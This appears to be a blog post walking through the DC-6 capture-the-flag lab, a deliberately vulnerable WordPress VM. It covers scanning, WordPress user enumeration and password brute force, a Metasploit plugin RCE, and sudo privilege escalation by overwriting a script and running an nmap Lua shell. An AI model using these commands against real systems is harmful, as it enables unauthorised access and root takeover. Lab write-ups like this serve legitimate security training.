<!DOCTYPE html>
<html lang="en">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="Dmagic" />
  <meta name="author" content="Dmagic" />
  <meta name="description" content="Dmagic" />
  
  
  <title>
    
      DC-6 
      
      
      |
    
     Weeds - 野草
  </title>

  
    <link rel="apple-touch-icon" href="https://ae01.alicdn.com/kf/U8f9a193ee8f04b09b08b3d8ceedb159d2.jpg">
    <link rel="icon" href="https://ae01.alicdn.com/kf/U8f9a193ee8f04b09b08b3d8ceedb159d2.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="/iconfont/iconfont.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">


  <!-- jquery3.3.1 -->
  <script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

  <!-- fancybox -->
  <link href="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.css" rel="stylesheet">
  <script async src="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.js"></script>
  
<script src="/js/fancybox.js"></script>


  

<meta name="generator" content="Hexo 5.3.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="https://ae01.alicdn.com/kf/U8f9a193ee8f04b09b08b3d8ceedb159d2.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">Dmagic</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->

<!-- LaTex Display -->
<script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
<script type="text/javascript" id="MathJax-script" async
  src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js">
</script>
<script>
MathJax = {
  tex: {
    inlineMath: [['$', '$'], ['\\(', '\\)']]
  }
};
</script>



  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">DC-6</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime" title="Update time"></i>
          2021-01-08 00:00:00
        </span>
        
      </div>
      <div class="markdown-body">
        <h2 id="环境情况"><a href="#环境情况" class="headerlink" title="环境情况"></a>环境情况</h2><p>攻击机IP：192.168.56.105</p>
<p>靶机IP：192.168.56.134</p>
<p>修改一下hosts如下：</p>
<p><img src="https://img.rruu.net/image/6038158ff3dd9" alt="image-20201230092436969"></p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -A -n -sV -p- -oA DC-6 192.168.56.134</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/6038159daf7bd" alt="image-20201230092506200"></p>
<p>开放端口 80 22</p>
<p>22 ssh</p>
<p>80 http</p>
<h2 id="80端口渗透"><a href="#80端口渗透" class="headerlink" title="80端口渗透"></a>80端口渗透</h2><p>火狐打开看看，经验判断是一个wordpress</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">firefox http:&#x2F;&#x2F;wordy</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/603815a4f19eb" alt="image-20201230092615057"></p>
<h3 id="dirsearch扫描目录"><a href="#dirsearch扫描目录" class="headerlink" title="dirsearch扫描目录"></a>dirsearch扫描目录</h3><p>很明显是一个wordpress</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 .&#x2F;tools&#x2F;dirsearch&#x2F;dirsearch.py -e php --full-url -t 50  -u http:&#x2F;&#x2F;wordy</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/603815af5c332" alt="image-20201230092654308"></p>
<p>后台地址：<a target="_blank" rel="noopener" href="http://wordy/wp-login.php">http://wordy/wp-login.php</a></p>
<h3 id="wpscan检测web站点"><a href="#wpscan检测web站点" class="headerlink" title="wpscan检测web站点"></a>wpscan检测web站点</h3><p>这里的apitoken你们自己去申请，免费的。<a target="_blank" rel="noopener" href="https://wpscan.com/">https://wpscan.com/</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http:&#x2F;&#x2F;wordy --enumerate u,vp --api-token H6G9ulWiQ --plugins-detection aggressive</span><br></pre></td></tr></table></figure>
<p>枚举用户名</p>
<p><img src="https://img.rruu.net/image/603815b5e94a0" alt="image-20201230095331544"></p>
<p>发现rce漏洞，这个漏洞需要一个普通用户，我们使用wpscan爆破吧。</p>
<p><img src="https://img.rruu.net/image/603815bce80c8" alt="image-20201230095413940"></p>
<p>在使用wpscan爆破之前，我们需要留意一下作者给的说明。意思是，要是我们不想等待某个过程很长时间，就使用这条命令生成一个字典，这个字典他也没有明确告诉我们要干嘛，但是这个字典名字就是密码，所以我们用来当作密码字典吧。</p>
<p>OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.</p>
<p>cat /usr/share/wordlists/rockyou.txt | grep k01 &gt; passwords.txt That should save you a few years. ;-)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat &#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;rockyou.txt | grep k01 &gt; passwords.txt</span><br></pre></td></tr></table></figure>
<p>执行如下命令，开始爆破</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http:&#x2F;&#x2F;wordy -U jens,graham,mark,sarah -P .&#x2F;passwords.txt -t 50</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/603815c53fe67" alt="image-20201230100635240"></p>
<h4 id="MSF利用漏洞"><a href="#MSF利用漏洞" class="headerlink" title="MSF利用漏洞"></a>MSF利用漏洞</h4><p>配置如下：</p>
<p><img src="https://img.rruu.net/image/603815cc9e732" alt="image-20201230100736110"></p>
<p>要设置forceexploit为true，然后运行，即可返回shell。</p>
<p><img src="https://img.rruu.net/image/603815d316b6e" alt="image-20201230100719906"></p>
<h2 id="特权提升"><a href="#特权提升" class="headerlink" title="特权提升"></a>特权提升</h2><h3 id="python切换bash"><a href="#python切换bash" class="headerlink" title="python切换bash"></a>python切换bash</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &#39;import pty;pty.spawn(&quot;&#x2F;bin&#x2F;bash&quot;)&#39;</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/603815d9ca090" alt="image-20201230101612560"></p>
<h3 id="收集home目录信息"><a href="#收集home目录信息" class="headerlink" title="收集home目录信息"></a>收集home目录信息</h3><p>发现密码，我们使用ssh登录</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat things-to-do.txt</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/603815dec6519" alt="image-20201230102012272"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh graham@192.168.56.134</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/603815e63bb99" alt="image-20201230102107407"></p>
<h3 id="sh文件劫持"><a href="#sh文件劫持" class="headerlink" title="sh文件劫持"></a>sh文件劫持</h3><p>查看用户权限</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/603815ec97c56" alt="image-20201230102710382"></p>
<p>查看sudo配置</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo -l</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/603815f20a5d6" alt="image-20201230102618640"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat backups.sh</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/603815f781474" alt="image-20201230102549087"></p>
<p>查看权限，发现我们拥有rwx权限。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls -la</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/603815fd6a3af" alt="image-20201230102648801"></p>
<p>切换jens用户</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo &#39;&#x2F;bin&#x2F;bash&#39; &gt; backups.sh</span><br><span class="line">sudo -u jens .&#x2F;backups.sh</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/60381602a7ece" alt="image-20201230102917791"></p>
<h3 id="sudo-nmap提权"><a href="#sudo-nmap提权" class="headerlink" title="sudo nmap提权"></a>sudo nmap提权</h3><p>查看sudo配置</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo -l</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/6038160776be6" alt="image-20201230103015983"></p>
<p>nmap提权</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">TF&#x3D;$(mktemp)</span><br><span class="line">echo &#39;os.execute(&quot;&#x2F;bin&#x2F;sh&quot;)&#39; &gt; $TF</span><br><span class="line">sudo nmap --script&#x3D;$TF</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/6038160caba3c" alt="image-20201230103302639"></p>
<p>获取flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat &#x2F;root&#x2F;flag.txt</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/60381611a9982" alt="image-20201230103339435"></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2021/01/06/DC-5/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2021-01-08 00:00:00
            </span>
            
          </div>
          <div class="post-foot-prev">
            
              <a href="/2021/01/10/DC-7/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div class="post-catalog" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E6%83%85%E5%86%B5"><span class="toc-text">环境情况</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#80%E7%AB%AF%E5%8F%A3%E6%B8%97%E9%80%8F"><span class="toc-text">80端口渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#dirsearch%E6%89%AB%E6%8F%8F%E7%9B%AE%E5%BD%95"><span class="toc-text">dirsearch扫描目录</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#wpscan%E6%A3%80%E6%B5%8Bweb%E7%AB%99%E7%82%B9"><span class="toc-text">wpscan检测web站点</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#MSF%E5%88%A9%E7%94%A8%E6%BC%8F%E6%B4%9E"><span class="toc-text">MSF利用漏洞</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%89%B9%E6%9D%83%E6%8F%90%E5%8D%87"><span class="toc-text">特权提升</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#python%E5%88%87%E6%8D%A2bash"><span class="toc-text">python切换bash</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%B6%E9%9B%86home%E7%9B%AE%E5%BD%95%E4%BF%A1%E6%81%AF"><span class="toc-text">收集home目录信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sh%E6%96%87%E4%BB%B6%E5%8A%AB%E6%8C%81"><span class="toc-text">sh文件劫持</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sudo-nmap%E6%8F%90%E6%9D%83"><span class="toc-text">sudo nmap提权</span></a></li></ol></li></ol>
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        





      </div>
    
  </div>


        <div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/magisec/">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    <div class="footer-more">
      
        Copyright © magisec 2021
        
    </div>
  
</div>

      </div>

      <div class="back-to-top hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



      
  <div class="search-icon" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




    </div>
  </body>
</html>
